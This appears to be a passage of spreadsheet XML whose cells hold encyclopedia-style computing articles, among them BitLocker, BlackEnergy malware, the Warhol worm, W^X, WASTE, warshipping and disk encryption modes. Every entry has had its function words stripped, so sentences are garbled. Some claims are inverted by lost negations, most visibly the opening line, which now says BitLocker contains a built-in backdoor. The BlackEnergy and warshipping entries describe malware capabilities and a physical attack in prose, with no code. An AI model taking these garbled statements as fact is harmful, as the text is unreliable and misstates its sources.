sources, bitlocker contain intentionally built-in backdoor, i.e., enforcement guaranteed passage data user's drives provided microsoft. 2006, home office expressed concern lack backdoor tried entering talks microsoft introduced. microsoft developer cryptographer niels ferguson denied backdoor request said, "over dead body." microsoft engineers said agents also pressure numerous meetings order backdoor, although formal, written request ever made; microsoft engineers eventually suggested agents look hard copy bitlocker program suggests users make.niels ferguson's position "back doors simply acceptable" accordance kerckhoffs's principle. stated netherlands born cryptographer auguste kerckhoffs 19th century, principle holds cryptosystem secure, even everything system, except key, public knowledge. other concerns starting windows windows server 2012, microsoft removed elephant diffuser bitlocker scheme declared reason. rosendorf's research shows removing elephant diffuser "undeniably negative impact" security bitlocker encryption targeted attack. microsoft later cited performance concerns, noncompliance federal information processing standards (fips), justify diffuser's removal. starting windows version 1511, however, microsoft added fips-compliant xts-aes encryption algorithm bitlocker. starting windows version 1803, microsoft added feature called "kernel protection" bitlocker, attacks thunderbolt ports.in october 2017, reported flaw (roca vulnerability) code library developed infineon, widespread security products smartcards tpms, enabled private keys inferred public keys. this could allow attacker bypass bitlocker encryption affected chip used. microsoft released updated version firmware infineon chips fixes flaw windows update. also features windows vista list microsoft windows components vista technologies next-generation secure computing base filevault references external links bitlocker drive encryption technical overview system integrity team blog</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>blackenergy malware first reported 2007 http-based toolkit generated bots execute distributed denial service attacks. 2010, blackenergy emerged capabilities beyond ddos. 2014, blackenergy came equipped variety plug-ins. russian-based group known sandworm (aka voodoo bear) attributed using blackenergy targeted attacks. attack distributed word document powerpoint attachment email, luring victims clicking seemingly legitimate file. blackenergy (be1) blackenergy's code facilitates different attack types infect target machines. also equipped server-side scripts perpetrators develop command control (c&amp;c) server. cybercriminals blackenergy builder toolkit generate customized client executable files distributed targets email spam phishing e-mail campaigns. lacks exploit functionalities relies external tools load bot. blackenergy detected using yara signatures provided united states department homeland security (dhs). features target address hostname runtime encrypter evade detection antivirus software hides processes system driver (syssrv.sys) command types ddos attack commands (e.g. icmp flood, flood, flood, http flood, flood, etc.) download commands retrieve launch updated executables server control commands (e.g. stop, wait, die) blackenergy (be2) blackenergy uses sophisticated rootkit/process-injection techniques, robust encryption, modular architecture known "dropper". this decrypts decompresses rootkit driver binary installs victim machine server randomly generated name. update blackenergy combines older rootkit source code functions unpacking injecting modules user processes. packed content compressed using lz77 algorithm encrypted using modified version cipher. hard-coded 128-bit decrypts embedded content. decrypting network traffic, cipher uses bot's unique identification string key. second variation encryption/compression scheme adds initialization vector modified cipher additional protection dropper rootkit unpacking stub, used inner rootkit userspace modules. primary modification implementation blackenergy lies key-scheduling algorithm. capabilities execute local files download execute remote files updates plugins command control servers execute destroy commands blackenergy (be3) latest full version blackenergy emerged 2014. changes simplified malware code: version installer drops main dynamically linked library (dll) component directly local application data folder. this variant malware involved december 2015 ukraine power grid cyberattack. plug-ins fs.dll file system operations si.dll system information, “blackenergy lite” jn.dll parasitic infector ki.dll keystroke logging ps.dll password stealer ss.dll screenshots vs.dll network discovery, remote execution tv.dll team viewer rd.dll simple pseudo “remote desktop” up.dll update malware dc.dll list windows accounts bs.dll query system hardware, bios, windows info dstr.dll destroy system scan.dll network scan references</t>
  </si>
  <si>
    <t>Water filling algorithm</t>
  </si>
  <si>
    <t>water filling algorithm general name given ideas communication systems design practice equalization strategies communications channels. name suggests, water finds level even filled part vessel multiple openings, consequence pascal's law, amplifier systems communications network repeaters, receivers amplify channel required power level compensating channel impairments. see, example, channel power allocation mimo systems. single channel systems single channel communication system deamplification loss present simplistically taken attenuation percentage amplifiers restore signal power level value transmission setup operating gain e.g. experience attenuation transmission, i.e. loss, amplify signal factor restore signal transmitter levels. multichannel systems same ideas carried presence impairments multiple channel system. amplifier nonlinearity, crosstalk power budgets prevent waterfilling algorithms restore channels, subset benefit them. also water-pouring algorithm zero-forcing equalizer robert lucky amplifier system edfa references proakis, digital communication systems, ed., mcgraw hill, (2001).</t>
  </si>
  <si>
    <t>Warren Abstract Machine</t>
  </si>
  <si>
    <t>1983, david warren designed abstract machine execution prolog consisting memory architecture instruction set. this design became known warren abstract machine (wam) become facto standard target prolog compilers. purpose purpose compiling prolog code low-level code make subsequent interpretation prolog program efficient. prolog code reasonably easy translate instructions, efficiently interpreted. also, subsequent code improvements compilations native code often easier perform low-level representation. order write efficient prolog programs, basic understanding works advantageous. some important concepts first argument indexing relation choice-points, tail call optimization, memory reclamation failure. memory areas following memory areas: global stack heap, used store compound terms local stack environment frames choice-points trail record variables bindings ought undone backtracking example here piece prolog code: wam-based prolog compiler compile instructions similar following: important characteristic code ability cope various modes predicates evoked: argument might variable, ground term, partly instantiated term. "switch" instructions handle different cases. references</t>
  </si>
  <si>
    <t>Warhol worm</t>
  </si>
  <si>
    <t>warhol worm extremely rapidly propagating computer worm spreads fast physically possible, infecting vulnerable machines entire internet minutes less. term based andy warhol's remark future, everyone minutes fame". analysis extended stuart staniford create flash worm concept. more information concepts "how internet spare time" staniford, paxson, weaver (appeared usenix security 2002). 2003, slammer became first observed example warhol worm. mechanism slammer's spread used pseudo-random number generator seeded system variable determine addresses attack next. spite deficiencies implementation, randomized attack highly effective. according caida-coordinated analysis slammer outbreak, growth followed exponential curve doubling time seconds early phases attack, slowed collapse many networks denial service caused slammer's traffic. vulnerable machines infected within minutes, showing original estimate infection speed roughly correct. external links warhol worms: potential very fast internet plagues nicholas weaver report caida-coordinated study slammer/sapphire "how internet spare time", staniford, paxson, weaver. usenix security 2002. cross site scripting warhol worm</t>
  </si>
  <si>
    <t>Wanova</t>
  </si>
  <si>
    <t>wanova, inc, headquartered jose, california, provides software help organizations manage, support protect data desktop laptop computers. wanova's primary product, wanova mirage, designed alternative server-hosted desktop virtualization technologies. history wanova founded january 2008 ilan kessler issy ben-shaul, previously co-founders actona technologies, acquired cisco 2004 became foundation cisco wide area application services (waas). company received first round funding greylock partners, carmel ventures opus capital million. 2012 issy ben-shaul announced wanova blog wanova become part vmware. products february 2011, primary product, wanova mirage hybrid desktop virtualization software, three components: wanova mirage client, wanova mirage server, wanova network optimization. mirage client small installs user, allows endpoint become managed mirage server. mirage server provides tools creating, managing deploying base image, typically consists operating system (os) core applications administrator wants manage centrally, microsoft office antivirus. mirage server also manages backup restore synchronization process. distributed desktop optimization incorporates capabilities deduplication compression make product effective bandwidth, high-latency wan. once mirage installed, administrators maintain complete, bootable desktop instance data center. this instance hardware agnostic, instantiated physical hardware virtual machine. hypervisor required instance deployed hardware. vmware mirage works mirage logically splits individual layers independently managed: base image; layer including user-installed applications machine information, machine layer including user data, files personalization. manner, create single read-only base image, typically including operating system (os) core applications manage centrally, microsoft office antivirus solution. this base image deployed locally stored copy synchronized whole endpoint. because layering, image patched, updated, re-synchronized needed, without overwriting user-installed applications data. these features, combined network optimizations, create number cases: single image management manage primary image synchronize thousands endpoints hardware migration replacing base image associated user's user's desktop, including applications, data, personalization settings, migrated hardware, including hardware different manufacturer. this process used part regular hardware migration process, quickly replace lost, stolen broken remote repair damaged application ‘enforcing’ base image, ensure remote device exactly matches primary copy data center, repairing core application problems. place migration windows windows replacing base image associated user's user's desktop, including data personalization settings, migrated windows windows network without added infrastructure. differences vmware mirage virtual desktop infrastructure (vdi) virtual desktop infrastructure, vdi, initially branded vmware. term enjoyed broader usage, however, come known synonym server-hosted desktop virtualization, hosted virtual desktops (gartner). typical architecture replaces users desktops deploying desktop virtual machine, running server data center. users access view desktop thin client access device, using vendor-specific protocol. vmware mirage differs fundamentally type architecture following ways: hypervisor required: while mirage operate within type-1 type-2 hypervisor, required. vmware mirage client operates service within windows operating system (os). scalability: because uses centralized servers handle processing functions desktop, typical server support roughly 10-12 users, depending load. mirage uses endpoints processing, consequently scale 1500:1 desktop server ratio. deployment: environments, mirage deployment leverages components organization already place: endpoint pcs, server, back-end storage. users change workflow, network optimizations: mirage leverages global single index enables significant deduplication across users, reducing network traffic storage requirements. storage: because users require synchronous network access centralized desktop, performance significantly impacted type back storage. because mirage clients local instance centrally stored desktop, storage accessed synchronization required. secondary storage, including lower cost sata drives, adequate. known limitations software currently compatible windows there native offering operating systems linux os-x. software still used inside virtual machines running supported windows platforms. also desktop virtualization virtual desktop infrastructure references external links wanova part vmware wanova blog. 2012 wanova mirage managing physical, virtual cloud windows desktops zdnet. february 2011 wanova makes mirage virtual desktop solution enterprise-ready eweek. january 2011 techtarget’s searchservervirtualization.com announces “best vmworld” 2010 award winners businesswire. september 2010 wanova redefines windows desktop management provisioning eweek. august 2010 desktop virtualization aids windows migration itbusinessedge, september 2010 products week networkworld. 2010 startup wanova launches distributed desktop virtualization guy. march 2010 wanova releases mirage desktop virtualization software eweek. march 2010 four reasons might search virtual desktop. july 2010 wanova home page</t>
  </si>
  <si>
    <t>W^X</t>
  </si>
  <si>
    <t>("write execute", pronounced security feature operating systems virtual machines. memory protection policy whereby every page process's kernel's address space either writable executable, both. without protection, program write data "w") instructions area memory intended data executable "x"; read-execute "rx") instructions. this dangerous writer memory malicious. unix-like terminology strict general concept executable space protection, controlled mprotect system call. relatively simple processors support fine-grained page permissions, sun's sparc sparc64, amd's amd64, hewlett-packard's pa-risc, hp's (originally digital equipment corporation's) alpha, arm. also applied file system write/execute permissions mitigate file write vulnerabilities memory) attacker persistence. enforcing restrictions file permissions also close gaps enforcement caused memory mapped files. outright forbidding usage arbitrary native code also mitigate kernel vulnerabilities exposed existing code computer. compatibility some early intel processors lacked required w^x, appeared later chips. limited processors intel i386, requires using code segment limit "line sand", point address space execution permitted data located, allowed executable pages placed. this scheme used exec shield.linker changes generally required separate data code (such trampolines needed linker library runtime functions). switch allowing mixing usually called execstack unix-like systemsw^x also pose minor problem just-in-time compilation, involves interpreter generating machine code running simple solution used most, including firefox, involves making page executable interpreter done writing machine code, using virtualprotect windows mprotect unix-likes. solution involves mapping region memory pages, there simple consensus solution safer: supporters latter approach believe allowing page ever writable executed defeats point (there exists selinux policy control operations called allow_execmod) address space layout randomization would make safe pages process. supporters former approach believe latter approach safe pages given separate processes, inter-process communication would costlier calling mprotect. history first implemented openbsd 3.3, released 2003. 2004, microsoft introduced similar feature called (data execution prevention) windows similar features available operating systems, including exec shield patches linux, netbsd's implementation pax. enterprise linux (and automatically centos) version linux kernel 2.6.18-8, selinux received allow_execmem, allow_execheap, allow_execmod policies provide disabled. although dep) protected userland programs existence, 2012 microsoft extended windows kernel architectures. late 2014 early 2015, added openbsd kernel amd64 architecture. early 2016, fully implemented netbsd's amd64 kernel partially i386 kernel. macos computers running apple silicon processors enforce programs. intel-based macs enforce policy programs os's hardened runtime mode.starting firefox 2016, firefox's virtual machine javascript also implements policy.starting .net 2021, .net uses w^x. references external links openbsd-3.3 announcement, public release slides presentation openbsd lead developer theo raadt covering</t>
  </si>
  <si>
    <t>Bitvise</t>
  </si>
  <si>
    <t>bitvise proprietary secure remote access software developed windows available client server. software based secure shell (ssh) protocol, provides secure channel insecure network client-server architecture. technology bitvise software implements version secure shell (ssh) protocol, sftp versions well ftps according publicly available standards. development software developed published bitvise limited. first released product bitvise server, named winsshd, 2001, shortly followed tunnelier, bitvise client. there major releases software far. features both server client work desktop server versions windows allow remote-based access using tool like winwnc. they provide well command-line interface support sftp, ssh, scp, using tcp/ip tunneling feature.the software among supports gssapi-enabled kerberos exchange ntlm kerberos user authentication. provides two-factor authentication compatibility 6238 authenticator apps. also comparison clients comparison servers references external links official website</t>
  </si>
  <si>
    <t>WHQL Testing</t>
  </si>
  <si>
    <t>windows hardware certification program (formerly windows hardware quality labs testing, whql testing, windows logo testing) microsoft's testing process involves running series tests third-party device drivers, submitting files tests microsoft review. procedure also include microsoft running tests wide range equipment, different hardware different microsoft windows editions. overview products pass whql tests "certified windows" logo, certifies hardware software share testing microsoft ensure compatibility. actual logo used depends version microsoft windows. past, microsoft also awarded similar logo part different software certification program apps passed software compatibility tests.) device drivers passing whql tests, microsoft creates digitally signed certification file that, included driver installation package allows installation 64-bit versions windows prevents 32-bit versions windows displaying warning message driver certified microsoft. since june 2007, microsoft added audio fidelity test (audio precision sys-2722-a-m) requirement system submissions.a company choose sign drivers rather whql testing process. these drivers would qualify "certified windows" logos, would install windows without warning.device drivers passed whql tests also made available download using windows update microsoft update catalog. windows windows detects device built-in drivers, shows found hardware wizard dialog box. microsoft since dismantled dialog box, avoid windows pre-install whql-certified driver connecting device. since january 2014, microsoft longer requires whql testing fee, used us$250 operating system family. this covered driver skus, submitted simultaneously, non-refundable. include expenses, windows license necessary running whql tests, verisign certificate necessary submitting test results.sometimes ambiguity responsible providing drivers, supported. this case industry-standard devices, used much broadly platform, microsoft supply drivers. example, whql bluetooth headsets. also windows hardware (whlk) windows hardware certification (whck) references external links windows hardware developer center (whdc)</t>
  </si>
  <si>
    <t>WBAdmin</t>
  </si>
  <si>
    <t>computing, wbadmin command-line utility built windows vista, windows server 2008, windows windows server 2008 windows windows server 2012, windows operating systems. command used perform backups restores operating systems, drive volumes, computer files, folders, applications command-line interface. features wbadmin disk-based backup system. create "bare metal" backup used restore windows operating system similar dissimilar hardware. backup file(s) created primarily form microsoft's virtual hard disk (.vhd) files accompanying .xml configuration files. backup .vhd file mounted windows disk manager view content. however, .vhd backup file direct "disk clone". utility replaces previous microsoft windows backup command-line tool, ntbackup, came built-into windows 4.0, windows 2000, windows windows server 2003. command-line version backup restore. wbadmin also graphical user interface (gui) option available simplify creation computer backup (and restore). workstation editions windows backup wizard located control panel. server version done (easily installed) windows feature using windows management console wbadmin.msc. wbadmin management console simplifies restoration, whether single file multiple folders. using command-line graphical user interface, wbadmin creates backup quickly restored using windows media install backup files located removable disk without need re-install scratch. wbadmin uses differencing engine update backup files. once original backup file created volume shadow copy service updates changes, subsequent full backups take matter moments rather many minutes taken create original backup file. automatic backups scheduled regular basis using wizard. kinds restore operations supported: bare metal restore: using windows recovery environment complete full server restoration either server server dissimilar hardware (known hardware independent restore hir) individual file folder, system state restore: files, folders, machine’s system state restored command-line using wbadmin. references further reading john paul mueller (2007). windows administration command line windows vista, windows 2003, windows windows 2000. john wiley sons. isbn 978-0470165799. stanek, william (2008). windows command-line administrator's pocket consultant, edition. microsoft press. isbn 978-0735622623. external links guide scheduling complete backup using wbadmin ntbackup restore utility windows server 2008 backup basics microsoft microsoft's windows server backup guide wbadmin commands list microsoft guide windows vista backup microsoft backup recovery overview windows server 2008 backup work?</t>
  </si>
  <si>
    <t>WASTE</t>
  </si>
  <si>
    <t>waste peer-to-peer friend-to-friend protocol software application developed justin frankel nullsoft 2003 features instant messaging, chat rooms, file browsing/sharing capabilities. name waste reference thomas pynchon's novel crying novel, w.a.s.t.e. (among things) underground postal service. 2003, less hours release, waste removed distribution aol, nullsoft's parent company. original page replaced statement claiming posting software unauthorized lawful rights held anyone downloaded spite original claim software released terms general public license. several developers modified upgraded waste client protocol. sourceforge edition considered many official development branch, several forks. description waste decentralized chat, instant messaging file sharing program protocol. behaves similarly virtual private network connecting group trusted computers, determined users. this kind network commonly referred darknet. uses strong encryption ensure third parties cannot decipher messages transferred. encryption used transmit receive instant messages, chat, files, maintain connection, browse search. waste networks waste networks decentralized (see social networks), meaning central server everyone connects peers must connect individually. normally, accomplished individuals sharing public keys, ensuring computers accessible appropriate ports (one parties must address port reached other), entering address port someone network connect once connected network, public keys automatically exchanged amongst members (provided enough members forward accept public keys), nodes attempt connect other, strengthening network (decreasing odds node going collapse shut part network), well increasing number possible routes given point point, decreasing latency bandwidth required communication file transfer. since waste connects small, private groups rather large, public ones, network search feature fastest decentralized applications. instant messaging file sharing capabilities much closer instant messenger typical file sharing programs. members network create private public chat rooms, instant message other, browse other's files, trade files, including pushing active sending files hosts, well common downloading users. simple drag-and-drop chat boxes send files intended destinations. suggested size waste network (referred mesh users) 10-50 nodes, though suggested size network less critical ratio nodes willing route traffic not. with original nullsoft-client groups exceeding years age, uncommon stable meshes host multiple terabytes secure content. default, waste listens incoming connections port 1337. this probably chosen 1337's leet connotations. since central hub, waste networks typically employ password passphrase, also called network name prevent collision. that member network connecting member another network, thus bridging networks. assigning unique identifier (passphrase) network, risk collisions reduced, particularly original clients. nullnets nullnets networks without passphrase. impossible know many nullnets exist, primary nullnet. best access nullnet post credentials waste exchange. nullnet easily merge nullnets passphrase, makes great place public discussion file sharing. strengths secured trade public keys, allowing safe secure communication data transfer trusted hosts. distributed nature means network dependent anyone setting server hub. contrast chat protocols require connect server. this means single point vulnerability network. similarly, single group leader; everyone network equal cannot including inviting members group, member kick another group, exclude public chats, etc. waste obfuscate protocol, making difficult detect waste used. waste saturate feature adds random traffic, making traffic analysis difficult. nodes (each trusted connection) automatically determine lowest latency route traffic and, load balance. this also improves privacy, packets often take different routes. shortcomings trading public keys, enabling port forwarding firewall necessary), connecting difficult and/or tedious process, especially technically proficient. network's distributed nature, impossible kick someone network they've gained access. since every member network member's public key, member needs regain access connect another member. coordinating change network name exceedingly difficult, best course action create another network migrate everyone network. this could, course, also seen strength. since central server, someone disconnects network, must know least network address reconnect. possible network drift addresses used none known, becomes necessary contact network member address information able reconnect. indeed, possible network could unknowingly split way. takes least coordination keep waste network intact; simple volunteers static address fixed dynamic (ddns) address (available free charge number providers) keeping node allow people reconnect network. while encryption performed using blowfish algorithm, thought strong, pcbc mode used several known security flaws. nicknames registered, allows eavesdropping spoofing. waste version reduces chances eavesdropping using public keys communication, network members choose nickname user must know recognize hash person wish communicate sure identity. connect behind firewall, party must proper port forwarded computer; waste networks depend central server around this. however, long node accepts incoming connections server, connecting nodes cannot accept incoming connections. indeed, long-term stability waste network depends hubs. versions version 1.7, waste comes experimental stable release. experimental branch implements packet size, improves overhead transfer speeds, compatible previous versions support packet size.waste 1.7.4 windows released december 2008, current october 2009. this branch sourceforge created inactivity main waste development branch. this fully featured version date.a cross-platform (including linux, microsoft windows) beta version waste called waste beta a.k.a. wxwaste, using wxwidgets toolkit available.via technologies released fork waste name padlocksl, removed product's website weeks. user interface written client available linux windows.blackbelt waste released fork waste. build labelled mark significant improvements across various areas functionality. supports networks well clearnet. routing updated provide even obfuscated meta-data internally. upnp support automatically handle port forwarding. also automatic anti-spoofing technology encourage unique users. under development since 2010, currently (jul 2021) regular releases improvements. also peer-to-peer (p2p) anonymous file sharing friend-to-friend (f2f) references external links waste fork original waste sourceforge site defunct blackbelt waste fork waste support well clearnet world's most dangerous geek(rolling stone interview justin frankel) wayback machine (archived march 2010) invisible inner circle anonymous communication with waste 'secure file transfer with waste introductory video' russell sayers showmedo zer0share project jack spratts' darknet</t>
  </si>
  <si>
    <t>Black screen of death</t>
  </si>
  <si>
    <t>black screen death fatal system error displayed versions microsoft windows operating system encountering critical system error cause system shut down. windows windows black screen death behaviour occurred dos-based application failed execute properly. often known occur connection attempting certain operations networking drivers resident memory. (commonly, exclusively, seen novell netware client dos, netx, loaded.). issue fixed instances adding additional section system.ini affected clients text timercriticalsection 10000. following files also updated, vtdapi.386re.386 vipx.38id-1991 brown, technician coca-cola company's department atlanta, reports company rolling windows within global marketing group users would attempt wordperfect, would receive black screen. this also black screen. later versions windows ms-dos, windows windows windows 2000, windows windows windows vista, windows windows also display black screen death operating system cannot boot. this usually missing file. this also happens user enables file compression files operating system compresses. often user must reinstall windows, missing file critical boot process. however, often boot screen inform user missing file. operating system compressed, able boot, even safe mode. however, booting another device uncompressing files usually solve issue. late 2009, several reports black screen death windows windows vista, windows emerged. first several claims pointed windows update. later recanted prevx erroneous report. microsoft reported security update causing issue, tied malware. cases, black screen replaced blue screen death. black screen death also caused certain components computer overheating, place traditional blue screen, appeared indicate stop error. this black screen simplified compared previous blue screen, omitting instructions user recommended take. windows also display black screen death unfinished update, scenarios system reboots present login screen, logging device stuck black screen. also fatal system error references external links windows black screen death example black screen</t>
  </si>
  <si>
    <t>Black-bag cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, black-bag cryptanalysis euphemism acquisition cryptographic secrets burglary, covert means rather mathematical technical cryptanalytic attack. term refers black equipment burglar would carry black operation. rubber-hose cryptanalysis, technically form cryptanalysis; term used sardonically. however, given free availability high strength cryptographic systems, type attack much serious threat users mathematical attacks often much easier attempt circumvent cryptographic systems (e.g. steal password) attack directly. regardless technique used, methods intended capture highly sensitive information e.g. cryptographic keys, key-rings, passwords unencrypted plaintext. required information usually copied without removing destroying capture often takes place without victim realizing occurred. methods addition burglary, covert means might include installation keystroke logging trojan horse software hardware installed near target computers ancillary devices. even possible monitor electromagnetic emissions computer displays keyboards distance metres more), thereby decode typed. this could done surveillance technicians, form concealed somewhere room. although sophisticated technology often used, black cryptanalysis also simple process copying password someone unwisely written piece paper left inside desk drawer. case united states scarfo highlighted instance agents using sneak peek warrant placed keystroke logger alleged criminal gang leader. also social engineering psychological manipulation people performing actions divulging confidential information black operation shoulder surfing using direct observation techniques, looking someone's shoulder, information rubber-hose cryptanalysis extraction cryptographic secrets coercion torture references external links cryptospacey website</t>
  </si>
  <si>
    <t>Warshipping</t>
  </si>
  <si>
    <t>computer network security, warshipping using physical package delivery service deliver attack vector target. this concept first described 2008 hacking convention robert graham david maynor part talk entitled, “bringing sexy back: breaking style”, included various penetration testing methods. implementation, iphone modified include larger battery, powered jailbroken iphone. first-generation iphone chosen attack based reported run-time days coupled external battery, whereas newer iphones would reportedly days. social engineering (security) pretext described would trick recipient believing iphone, order explain shipment. advancement low-power electronics, thanks part maker culture, greatly increased effectiveness methodology credible method attacking networks. 2019, x-force coined name “warshipping” described attack platform included several low-cost components could combined, shipped targets, controlled remotely weeks. solar component also described allow devices indefinitely.aspects modern warshipping attack include following: devices hidden recipient, potentially inside objects inside packaging material structure itself. command control (c2) capability dependable communication medium. most commonly provided cellular modems. power management strategy allows device operate weeks. solar panels utilized lengthen run-time device. devices used operational attack. these include radios built protocols bluetooth, wireless lan, near field communication (nfc), software-defined radio (sdr) devices capturing multiple types protocols. microphones, cameras, capture devices could included well. global positioning system (gps) technology reporting location device, allowing activation certain capabilities upon delivery target. passive triangulation around signal issuesthe increasing large, online retailers contributes relevancy attack. 2019, united states postal service reports deliver 484.8 million mailpieces day. name analogy wardriving wardialling. references</t>
  </si>
  <si>
    <t>Disk encryption theory</t>
  </si>
  <si>
    <t>disk encryption special case data rest protection storage medium sector-addressable device (e.g., hard disk). this article presents cryptographic aspects problem. overview, disk encryption. discussion different software packages hardware devices devoted problem, disk encryption software disk encryption hardware. problem definition disk encryption methods provide three distinct properties: data disk remain confidential. data retrieval storage fast operations, matter disk data stored. encryption method waste disk space (i.e., amount storage used encrypted data significantly larger size plaintext).the first property requires defining adversary data kept confidential. strongest adversaries studied field disk encryption abilities: read contents disk time; request disk encrypt store arbitrary files choosing; modify unused sectors disk request decryption.a method provides good confidentiality information adversary determine time whether data sector changed since last time looked. second property requires dividing disk several sectors, usually bytes (4096 bits) long, encrypted decrypted independently other. turn, data stay confidential, encryption method must tweakable; sectors processed exactly way. otherwise, adversary could decrypt sector disk copying unused sector disk requesting decryption. third property generally non-controversial. however, indirectly prohibits stream ciphers, since stream ciphers require, security, initial state used twice (which would case sector updated different data); thus would require encryption method store separate initial states every sector disk—seemingly waste space. alternative, block cipher, limited certain block size (usually bits). because this, disk encryption chiefly studies chaining modes, expand encryption block length cover whole disk sector. considerations already listed make several well-known chaining modes unsuitable: mode, cannot tweaked, modes turn block ciphers stream ciphers, mode. these three properties provide assurance disk integrity; tell whether adversary modifying ciphertext. part, absolute assurance disk integrity impossible: matter what, adversary could always revert entire disk prior state, circumventing checks. non-absolute level disk integrity desired, achieved within encrypted disk file-by-file basis using message authentication codes. block cipher-based modes like encryption schemes, block cipher-based disk encryption makes modes operation, allow encrypting larger amounts data ciphers' block-size (typically bits). modes therefore rules repeatedly apply ciphers' single-block operations. cipher-block chaining (cbc) cipher-block chaining (cbc) common chaining mode previous block's ciphertext xored current block's plaintext encryption: {\displaystyle c_{i}=e_{k}(c_{i-1}\oplus p_{i}).} since "previous block's ciphertext" first block, initialization vector (iv) must used {\displaystyle c_{-1}} this, turn, makes tweakable ways. suffers problems. example, predictable, adversary leave "watermark" disk, i.e., store specially created file combination files identifiable even encryption. exact method constructing watermark depends exact function providing ivs, general recipe create encrypted sectors identical first blocks {\displaystyle b_{1}} {\displaystyle b_{2}} related {\displaystyle b_{1}\oplus iv_{1}=b_{2}\oplus iv_{2}} thus encryption {\displaystyle b_{1}} identical encryption {\displaystyle b_{2}} leaving watermark disk. exact pattern "same-different-same-different" disk altered make watermark unique given file. protect watermarking attack, cipher hash function used generate current sector number, adversary cannot predict ivs. particular, essiv approach uses block cipher mode generate ivs. encrypted salt-sector initialization vector (essiv) essiv method generating initialization vectors block encryption disk encryption. usual methods generating predictable sequences numbers based example, time stamp sector number, permit certain attacks watermarking attack. essiv prevents attacks generating combination sector number hash key. combination form hash makes unpredictable. hash {\displaystyle iv({\textrm {sn}})=e_{s}({\text{sn}}),\ {\text{where}}\ s={\text{hash}}(k).} essiv designed clemens fruhwirth integrated linux kernel since version 2.6.10, though similar scheme used generate openbsd's swap encryption since 2000.essiv supported option dm-crypt freeotfe disk encryption systems. malleability attack while (with without essiv) ensures confidentiality, ensure integrity encrypted data. plaintext known adversary, possible change every second plaintext block value chosen attacker, blocks changed random values. this used practical attacks disk encryption cbc-essiv mode. liskov, rivest, wagner (lrw) order prevent elaborate attacks, different modes operation introduced: tweakable narrow-block encryption (lrw xex) wide-block encryption (cmc eme). whereas purpose usual block cipher {\displaystyle e_{k}} mimic random permutation secret {\displaystyle purpose tweakable encryption {\displaystyle e_{k}^{t}} mimic random permutation secret {\displaystyle known tweak {\displaystyle tweakable narrow-block encryption (lrw) instantiation mode operations introduced liskov, rivest, wagner (see theorem this mode uses keys: {\displaystyle block cipher {\displaystyle additional size block. example, 256-bit key, {\displaystyle 256-bit number {\displaystyle 128-bit number. encrypting block {\displaystyle logical index (tweak) {\displaystyle uses following formula: {\displaystyle {\begin{aligned}x&amp;=f\otimes i,\\c&amp;=e_{k}(p\oplus x)\oplus x.\end{aligned}}} here multiplication {\displaystyle \otimes addition {\displaystyle \oplus performed finite field {\displaystyle {\text{gf}}\left(2^{128}\right)} aes). with precomputation, single multiplication sector required (note addition binary finite field simple bitwise addition, also known xor): {\displaystyle f\otimes i=f\otimes (i_{0}\oplus \delta )=f\otimes i_{0}\oplus f\otimes \delta {\displaystyle f\otimes \delta precomputed possible values {\displaystyle \delta this mode operation needs single encryption block protects attacks except minor leak: user changes single plaintext block sector single ciphertext block changes. (note leak mode has: mode equal plaintexts different positions encrypted different ciphertexts.) some security concerns exist lrw, mode operation replaced xts. employed bestcrypt supported option dm-crypt freeotfe disk encryption systems. xor–encrypt–xor (xex) another tweakable encryption mode, (xor–encrypt–xor), designed rogaway allow efficient processing consecutive blocks (with respect cipher used) within data unit (e.g., disk sector). tweak represented combination sector address index block within sector (the original mode proposed rogaway allows several indices). ciphertext, {\displaystyle obtained using: {\displaystyle {\begin{aligned}x&amp;=e_{k}(i)\otimes \alpha ^{j},\\c&amp;=e_{k}(p\oplus x)\oplus x,\end{aligned}}} where: {\displaystyle plaintext, {\displaystyle number sector, {\displaystyle \alpha primitive element {\displaystyle {\text{gf}}(2^{128})} defined polynomial {\displaystyle i.e., number {\displaystyle number block within sector.the basic operations mode (aes cipher galois field multiplication) ones used galois/counter mode (gcm), thus permitting compact implementation universal lrw/xex/gcm hardware. original weakness. xex-based tweaked-codebook mode ciphertext stealing (xts) ciphertext stealing provides support sectors size divisible block size, example, 520-byte sectors 16-byte blocks. xts-aes standardized 2007-12-19 ieee p1619. standard supports using different encryption block encryption; contrary intent seems rooted misinterpretation original paper, harm security. result, users wanting aes-256 aes-128 encryption must supply bits bits respectively. january 2010, nist released special publication (sp) 800-38e final form. 800-38e recommendation xts-aes mode operation, standardized ieee 1619-2007, cryptographic modules. publication approves xts-aes mode algorithm reference ieee 1619-2007, subject additional requirement, limits maximum size encrypted data unit (typically sector disk block) blocks. according 800-38e, absence authentication access control, xts-aes provides protection approved confidentiality-only modes unauthorized manipulation encrypted data." supported bestcrypt, botan, netbsd's cgd, dm-crypt, freeotfe, truecrypt, veracrypt, diskcryptor, freebsd's geli, openbsd softraid disk encryption software, openssl, lion's filevault windows 10's bitlocker wolfcrypt. weaknesses mode susceptible data manipulation tampering, applications must employ measures detect modifications data manipulation tampering concern: "...since authentication tags ciphertext (original modified attacker) decrypted plaintext built-in mechanism detect alterations. best done ensure alteration ciphertext completely randomize plaintext, rely application uses transform include sufficient redundancy plaintext detect discard random plaintexts." this would require maintaining checksums data metadata disk, done btrfs. however, commonly used file systems ext4 ntfs metadata protected tampering, detection data tampering non-existent.the mode susceptible traffic analysis, replay randomization attacks sectors 16-byte blocks. given sector rewritten, attackers collect fine-grained byte) ciphertexts, used analysis replay attacks 16-byte granularity). would possible define sector-wide block ciphers, unfortunately degraded performance (see below). cbc–mask–cbc (cmc) ecb–mask–ecb (eme) protect even minor leak mentioned lrw. unfortunately, price twofold degradation performance: block must encrypted twice; many consider high cost, since leak sector level unavoidable anyway. cmc, introduced halevi rogaway, stands cbc–mask–cbc: whole sector encrypted mode (with {\displaystyle c_{-1}=e_{a}(i)} ciphertext masked xoring {\displaystyle 2(c'_{0}\oplus c'_{k-1})} re-encrypted mode starting last block. when underlying block cipher strong pseudorandom permutation (prp) sector level scheme tweakable prp. problem order decrypt {\displaystyle p_{0}} must sequentially pass data twice. order solve problem, halevi rogaway introduced parallelizable variant called (ecb–mask–ecb). works following way: plaintexts xored {\displaystyle l=e_{k}(0)} shifted different amount left, encrypted: {\displaystyle p'_{i}=e_{k}(p_{i}\oplus 2^{i}l)} mask calculated: {\displaystyle m=m_{p}\oplus m_{c}} {\displaystyle m_{p}=i\oplus \bigoplus p'_{i}} {\displaystyle m_{c}=e_{k}(m_{p})} intermediate ciphertexts masked: 